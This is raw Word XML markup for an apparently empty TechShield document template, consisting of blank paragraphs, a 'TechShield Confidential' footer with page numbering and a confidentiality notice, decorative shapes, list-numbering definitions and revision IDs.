    <w:p w14:paraId="12D7CFC8" w14:textId="77777777" w:rsidR="00005066" w:rsidRDefault="00005066" w:rsidP="001F4FF0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61CBD116" w14:textId="77777777" w:rsidR="00005066" w:rsidRDefault="00005066" w:rsidP="001F4FF0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B6592CE" w14:textId="77777777" w:rsidR="00005066" w:rsidRDefault="00005066" w:rsidP="001F4FF0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="528693AD" w14:textId="77777777" w:rsidR="00005066" w:rsidRDefault="00005066" w:rsidP="001F4FF0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FF66667" w14:textId="77777777" w:rsidR="00005066" w:rsidRDefault="00005066" w:rsidP="001F4FF0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CB358D0" w14:textId="77777777" w:rsidR="00005066" w:rsidRDefault="00005066" w:rsidP="001F4FF0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B38AEBF" w14:textId="77777777" w:rsidR="00005066" w:rsidRDefault="00005066" w:rsidP="001F4FF0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48366AFE" w14:textId="77777777" w:rsidR="00005066" w:rsidRDefault="00005066" w:rsidP="001F4FF0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="026C6D83" w14:textId="77777777" w:rsidR="00005066" w:rsidRDefault="00005066" w:rsidP="001F4FF0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05FBD6E7" w14:textId="77777777" w:rsidR="00005066" w:rsidRDefault="00005066" w:rsidP="001F4FF0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4950BB47" w14:textId="77777777" w:rsidR="00005066" w:rsidRDefault="00005066" w:rsidP="001F4FF0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21BB3159" w14:textId="77777777" w:rsidR="00005066" w:rsidRPr="002E1037" w:rsidRDefault="00005066" w:rsidP="001F4FF0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05781175" w14:textId="77777777" w:rsidR="001F4FF0" w:rsidRPr="005B7152" w:rsidRDefault="001F4FF0" w:rsidP="005B7152"/>
    <w:sectPr w:rsidR="001F4FF0" w:rsidRPr="005B7152">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20"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32A67" w14:textId="77777777" w:rsidR="00106DBB" w:rsidRDefault="00106DBB">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="09E0D33B" w14:textId="77777777" w:rsidR="00106DBB" w:rsidRDefault="00106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haroni">
    <w:charset w:val="B1"/>
    <w:family w:val="auto"/>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61D2" w14:textId="77777777" w:rsidR="00F627AD" w:rsidRDefault="00F627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542E" w14:textId="46B93C80" w:rsidR="00475B86" w:rsidRDefault="00757435" w:rsidP="28E2C82A">
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="8280"/>
      </w:tabs>
      <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
      <w:jc w:val="both"/>
      <w:rPr>
        <w:color w:val="666666"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="666666"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>TECHSHIELD</w:t>
    </w:r>
    <w:r w:rsidR="28E2C82A" w:rsidRPr="28E2C82A">
      <w:rPr>
        <w:color w:val="666666"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve"> CONFIDENTIAL</w:t>
    </w:r>
    <w:r w:rsidR="00922DBC">
      <w:rPr>
        <w:color w:val="666666"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r w:rsidR="28E2C82A" w:rsidRPr="28E2C82A">
      <w:rPr>
        <w:color w:val="666666"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r w:rsidR="00922DBC" w:rsidRPr="28E2C82A">
      <w:rPr>
        <w:noProof/>
        <w:color w:val="666666"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidR="00922DBC">
      <w:rPr>
        <w:color w:val="666666"/>
      </w:rPr>
      <w:instrText>PAGE</w:instrText>
    </w:r>
    <w:r w:rsidR="00922DBC" w:rsidRPr="28E2C82A">
      <w:rPr>
        <w:color w:val="666666"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="28E2C82A" w:rsidRPr="28E2C82A">
      <w:rPr>
        <w:noProof/>
        <w:color w:val="666666"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>2</w:t>
    </w:r>
    <w:r w:rsidR="00922DBC" w:rsidRPr="28E2C82A">
      <w:rPr>
        <w:noProof/>
        <w:color w:val="666666"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r w:rsidR="00922DBC">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="784A4A66" wp14:editId="5515166D">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>-1390649</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>422565</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="8515350" cy="32038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89400" y="1346650"/>
                        <a:ext cx="10843200" cy="223500"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:solidFill>
                        <a:srgbClr val="009DDC"/>
                      </a:solidFill>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                    </wps:spPr>
                    <wps:txbx>
                      <w:txbxContent>
                        <w:p w14:paraId="3E29A87C"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4A4A66" id="Rectangle 2" o:spid="_x0000_s1028" style="position:absolute;left:0;text-align:left;margin-left:-109.5pt;margin-top:33.25pt;width:670.5pt;height:25.2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" fillcolor="#009ddc" stroked="f">
              <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
                <w:txbxContent>
                  <w:p w14:paraId="3E29A87C" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00475B86">
                    <w:pPr>
                      <w:spacing w:line="240" w:lineRule="auto"/>
                      <w:textDirection w:val="btLr"/>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1CEC" w14:textId="09F1D4E5" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
    <w:pPr>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:i/>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:i/>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>Sensitive</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:i/>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">: The information in this document is strictly confidential and is intended for </w:t>
    </w:r>
    <w:proofErr w:type="spellStart"/>
    <w:r w:rsidR="00F627AD" w:rsidRPr="00F627AD">
      <w:rPr>
        <w:i/>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>TechShield</w:t>
    </w:r>
    <w:proofErr w:type="spellEnd"/>
    <w:r w:rsidR="00F627AD" w:rsidRPr="00F627AD">
      <w:rPr>
        <w:i/>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve"> Corporate Network</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="7E4487AF" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00475B86">
    <w:pPr>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:i/>
        <w:color w:val="66666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13D4" w14:textId="77777777" w:rsidR="00106DBB" w:rsidRDefault="00106DBB">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6B40C19B" w14:textId="77777777" w:rsidR="00106DBB" w:rsidRDefault="00106D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243C" w14:textId="77777777" w:rsidR="00F627AD" w:rsidRDefault="00F627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77A1" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
    <w:pPr>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:i/>
        <w:color w:val="666666"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="67260734" wp14:editId="38EF3E91">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>0</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>152400</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="952500" cy="59004"/>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5443000" y="1647850"/>
                        <a:ext cx="1059000" cy="48600"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:solidFill>
                        <a:srgbClr val="009DDC"/>
                      </a:solidFill>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                    </wps:spPr>
                    <wps:txbx>
                      <w:txbxContent>
                        <w:p w14:paraId="250A38AE"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7260734" id="Rectangle 3" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:12pt;width:75pt;height:4.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" fillcolor="#009ddc" stroked="f">
              <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
                <w:txbxContent>
                  <w:p w14:paraId="250A38AE" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00475B86">
                    <w:pPr>
                      <w:spacing w:line="240" w:lineRule="auto"/>
                      <w:textDirection w:val="btLr"/>
                    </w:pPr>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="square"/>
            </v:rect>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="4D401100" wp14:editId="2DD8FC0D">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>-1390649</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>-457199</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="8515350" cy="74696"/>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89400" y="1346650"/>
                        <a:ext cx="10843200" cy="77700"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:solidFill>
                        <a:srgbClr val="009DDC"/>
                      </a:solidFill>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                    </wps:spPr>
                    <wps:txbx>
                      <w:txbxContent>
                        <w:p w14:paraId="222FF56A"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D401100" id="Rectangle 1" o:spid="_x0000_s1027" style="position:absolute;left:0;text-align:left;margin-left:-109.5pt;margin-top:-36pt;width:670.5pt;height:5.9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" fillcolor="#009ddc" stroked="f">
              <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
                <w:txbxContent>
                  <w:p w14:paraId="222FF56A" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00475B86">
                    <w:pPr>
                      <w:spacing w:line="240" w:lineRule="auto"/>
                      <w:textDirection w:val="btLr"/>
                    </w:pPr>
                  </w:p>
                </w:txbxContent>
              </v:textbox>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E2C82A" w14:paraId="3BCDCEB3" w14:textId="77777777" w:rsidTr="28E2C82A">
      <w:trPr>
        <w:trHeight w:val="300"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="135127B7" w14:textId="494BDFC4" w:rsidR="28E2C82A" w:rsidRDefault="28E2C82A" w:rsidP="28E2C82A">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:ind w:left="-115"/>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="18682A53" w14:textId="7455FA28" w:rsidR="28E2C82A" w:rsidRDefault="28E2C82A" w:rsidP="28E2C82A">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:jc w:val="center"/>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="47AEA397" w14:textId="24F7CE36" w:rsidR="28E2C82A" w:rsidRDefault="28E2C82A" w:rsidP="28E2C82A">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:ind w:right="-115"/>
            <w:jc w:val="right"/>
          </w:pPr>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w14:paraId="4852E904" w14:textId="090A2560" w:rsidR="28E2C82A" w:rsidRDefault="28E2C82A" w:rsidP="28E2C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D75"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BAC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70DD9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C74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002BE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D322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45AB4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0C0C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779BC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DCC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C210B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="612AFE1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A8219B4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7CA8B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3A7EEB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8898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0373E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="20A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63BC4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3D8A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84691"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7B6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85D00"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2AD2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F063C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="91B6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648B3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3604818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numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1800" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:eastAsia="Roboto" w:hAnsi="Wingdings" w:cs="Roboto"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9177436"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="14D8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A80D17"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A41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83F74"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E77E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075914"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7B6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F1AAC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7B6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30124"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7B6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55D30"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="822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07A92"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EAE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A2A56"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9C42287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51706A7E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7B6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225222"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="585A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9E53B1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D314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4E41C0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7B6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7234D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D86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0157F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CD1E9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835794"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="37B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F09FE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F1CE3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589669D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C72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733F3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="506E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559599">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="755441747">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="705252175">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1715032969">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="140776065">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1286279713">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1756245802">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="210507712">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="871645966">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1894538071">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1951206571">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="125127477">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="324821901">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="319772856">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="698238326">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="2103212631">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1178275767">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1100955437">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="283122444">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1167135659">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="423186541">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1811049586">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="634215545">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="330985647">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="894774569">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="417024964">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="1841698764">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="1706442737">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="1661153497">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="173157055">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="911278329">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="1126973600">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="1092042507">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B86"/>
    <w:rsid w:val="00000429"/>
    <w:rsid w:val="00000561"/>
    <w:rsid w:val="00002EFA"/>
    <w:rsid w:val="00003681"/>
    <w:rsid w:val="00005066"/>
    <w:rsid w:val="00012B5F"/>
    <w:rsid w:val="000325CF"/>
    <w:rsid w:val="00036C24"/>
    <w:rsid w:val="00042451"/>
    <w:rsid w:val="00050877"/>
    <w:rsid w:val="00054322"/>
    <w:rsid w:val="000604E0"/>
    <w:rsid w:val="0006399F"/>
    <w:rsid w:val="00063B3B"/>
    <w:rsid w:val="00065C78"/>
    <w:rsid w:val="0006795F"/>
    <w:rsid w:val="00067F96"/>
    <w:rsid w:val="000704C4"/>
    <w:rsid w:val="00070E42"/>
    <w:rsid w:val="00074F45"/>
    <w:rsid w:val="00075FB2"/>
    <w:rsid w:val="000A3D67"/>
    <w:rsid w:val="000A6D10"/>
    <w:rsid w:val="000B1760"/>
    <w:rsid w:val="000B2F08"/>
    <w:rsid w:val="000B7FC5"/>
    <w:rsid w:val="000C20EF"/>
    <w:rsid w:val="000C39AB"/>
    <w:rsid w:val="000C557A"/>
    <w:rsid w:val="000C6FC2"/>
    <w:rsid w:val="000D450A"/>
    <w:rsid w:val="000F30C0"/>
    <w:rsid w:val="00102C09"/>
    <w:rsid w:val="00103363"/>
    <w:rsid w:val="00106059"/>
    <w:rsid w:val="00106DBB"/>
    <w:rsid w:val="001079F6"/>
    <w:rsid w:val="00122216"/>
    <w:rsid w:val="00166030"/>
    <w:rsid w:val="00170D8E"/>
    <w:rsid w:val="00173011"/>
    <w:rsid w:val="001838F8"/>
    <w:rsid w:val="00187DA5"/>
    <w:rsid w:val="00195304"/>
    <w:rsid w:val="001A631B"/>
    <w:rsid w:val="001A661C"/>
    <w:rsid w:val="001A7290"/>
    <w:rsid w:val="001B015A"/>
    <w:rsid w:val="001B0BC1"/>
    <w:rsid w:val="001D7723"/>
    <w:rsid w:val="001E30F8"/>
    <w:rsid w:val="001F4E85"/>
    <w:rsid w:val="001F4FF0"/>
    <w:rsid w:val="001F5C25"/>
    <w:rsid w:val="002012E9"/>
    <w:rsid w:val="00221717"/>
    <w:rsid w:val="002260A1"/>
    <w:rsid w:val="00240A8D"/>
    <w:rsid w:val="002544B1"/>
    <w:rsid w:val="002652B0"/>
    <w:rsid w:val="002676B7"/>
    <w:rsid w:val="00271D54"/>
    <w:rsid w:val="0027372C"/>
    <w:rsid w:val="0028323A"/>
    <w:rsid w:val="00284A9E"/>
    <w:rsid w:val="002870F8"/>
    <w:rsid w:val="00292DB8"/>
    <w:rsid w:val="00295127"/>
    <w:rsid w:val="00297608"/>
    <w:rsid w:val="002A373A"/>
    <w:rsid w:val="002A5A85"/>
    <w:rsid w:val="002B31C5"/>
    <w:rsid w:val="002B63BD"/>
    <w:rsid w:val="002B69D6"/>
    <w:rsid w:val="002D0065"/>
    <w:rsid w:val="002D5A5D"/>
    <w:rsid w:val="002D7B8D"/>
    <w:rsid w:val="002E1037"/>
    <w:rsid w:val="002E56BF"/>
    <w:rsid w:val="002F3798"/>
    <w:rsid w:val="003032C5"/>
    <w:rsid w:val="00303A32"/>
    <w:rsid w:val="00311C76"/>
    <w:rsid w:val="00321975"/>
    <w:rsid w:val="0033019D"/>
    <w:rsid w:val="00331255"/>
    <w:rsid w:val="003312D9"/>
    <w:rsid w:val="0035298A"/>
    <w:rsid w:val="00355BC1"/>
    <w:rsid w:val="00357344"/>
    <w:rsid w:val="00361886"/>
    <w:rsid w:val="00361F35"/>
    <w:rsid w:val="003622EA"/>
    <w:rsid w:val="00363802"/>
    <w:rsid w:val="0036509C"/>
    <w:rsid w:val="00371818"/>
    <w:rsid w:val="003732AE"/>
    <w:rsid w:val="00383287"/>
    <w:rsid w:val="003866CB"/>
    <w:rsid w:val="003A2AF3"/>
    <w:rsid w:val="003A55F2"/>
    <w:rsid w:val="003A6DFB"/>
    <w:rsid w:val="003A7623"/>
    <w:rsid w:val="003B1E38"/>
    <w:rsid w:val="003B22BD"/>
    <w:rsid w:val="003B5D59"/>
    <w:rsid w:val="003B64F3"/>
    <w:rsid w:val="003D36E7"/>
    <w:rsid w:val="003D4A28"/>
    <w:rsid w:val="003D4DCD"/>
    <w:rsid w:val="003D641E"/>
    <w:rsid w:val="003F20A3"/>
    <w:rsid w:val="003F6A37"/>
    <w:rsid w:val="003F70BA"/>
    <w:rsid w:val="003F73B8"/>
    <w:rsid w:val="00403B2B"/>
    <w:rsid w:val="00417035"/>
    <w:rsid w:val="0041753F"/>
    <w:rsid w:val="00421CCF"/>
    <w:rsid w:val="00437F03"/>
    <w:rsid w:val="00440CF0"/>
    <w:rsid w:val="004424CE"/>
    <w:rsid w:val="00443A49"/>
    <w:rsid w:val="00444C92"/>
    <w:rsid w:val="00454445"/>
    <w:rsid w:val="0046138A"/>
    <w:rsid w:val="00466DF6"/>
    <w:rsid w:val="0047080B"/>
    <w:rsid w:val="00475B86"/>
    <w:rsid w:val="004826D5"/>
    <w:rsid w:val="00487121"/>
    <w:rsid w:val="004A323E"/>
    <w:rsid w:val="004A37DF"/>
    <w:rsid w:val="004A4F58"/>
    <w:rsid w:val="004B1890"/>
    <w:rsid w:val="004B1DD4"/>
    <w:rsid w:val="004B4757"/>
    <w:rsid w:val="004D31DF"/>
    <w:rsid w:val="004D44E1"/>
    <w:rsid w:val="004D507D"/>
    <w:rsid w:val="004E58D1"/>
    <w:rsid w:val="004F5F4D"/>
    <w:rsid w:val="00506092"/>
    <w:rsid w:val="00520B3B"/>
    <w:rsid w:val="00521B3C"/>
    <w:rsid w:val="005404AB"/>
    <w:rsid w:val="00540DFA"/>
    <w:rsid w:val="00544CB2"/>
    <w:rsid w:val="00545C57"/>
    <w:rsid w:val="00550B1F"/>
    <w:rsid w:val="00551762"/>
    <w:rsid w:val="00551AFA"/>
    <w:rsid w:val="00552855"/>
    <w:rsid w:val="005533D0"/>
    <w:rsid w:val="00553FC1"/>
    <w:rsid w:val="00556CEC"/>
    <w:rsid w:val="00562197"/>
    <w:rsid w:val="00566395"/>
    <w:rsid w:val="00571B1C"/>
    <w:rsid w:val="00573A06"/>
    <w:rsid w:val="00585CFB"/>
    <w:rsid w:val="005926CF"/>
    <w:rsid w:val="00594249"/>
    <w:rsid w:val="005B12B2"/>
    <w:rsid w:val="005B7152"/>
    <w:rsid w:val="005C4611"/>
    <w:rsid w:val="005C72BC"/>
    <w:rsid w:val="005E2442"/>
    <w:rsid w:val="005E77CB"/>
    <w:rsid w:val="006021BB"/>
    <w:rsid w:val="00610F6E"/>
    <w:rsid w:val="0061799E"/>
    <w:rsid w:val="00620A25"/>
    <w:rsid w:val="00621A2B"/>
    <w:rsid w:val="0064341C"/>
    <w:rsid w:val="00652F66"/>
    <w:rsid w:val="00664CF8"/>
    <w:rsid w:val="00674531"/>
    <w:rsid w:val="006777E0"/>
    <w:rsid w:val="00681159"/>
    <w:rsid w:val="00683036"/>
    <w:rsid w:val="00693929"/>
    <w:rsid w:val="006A223A"/>
    <w:rsid w:val="006A5496"/>
    <w:rsid w:val="006B0642"/>
    <w:rsid w:val="006C2AA9"/>
    <w:rsid w:val="006C2B5F"/>
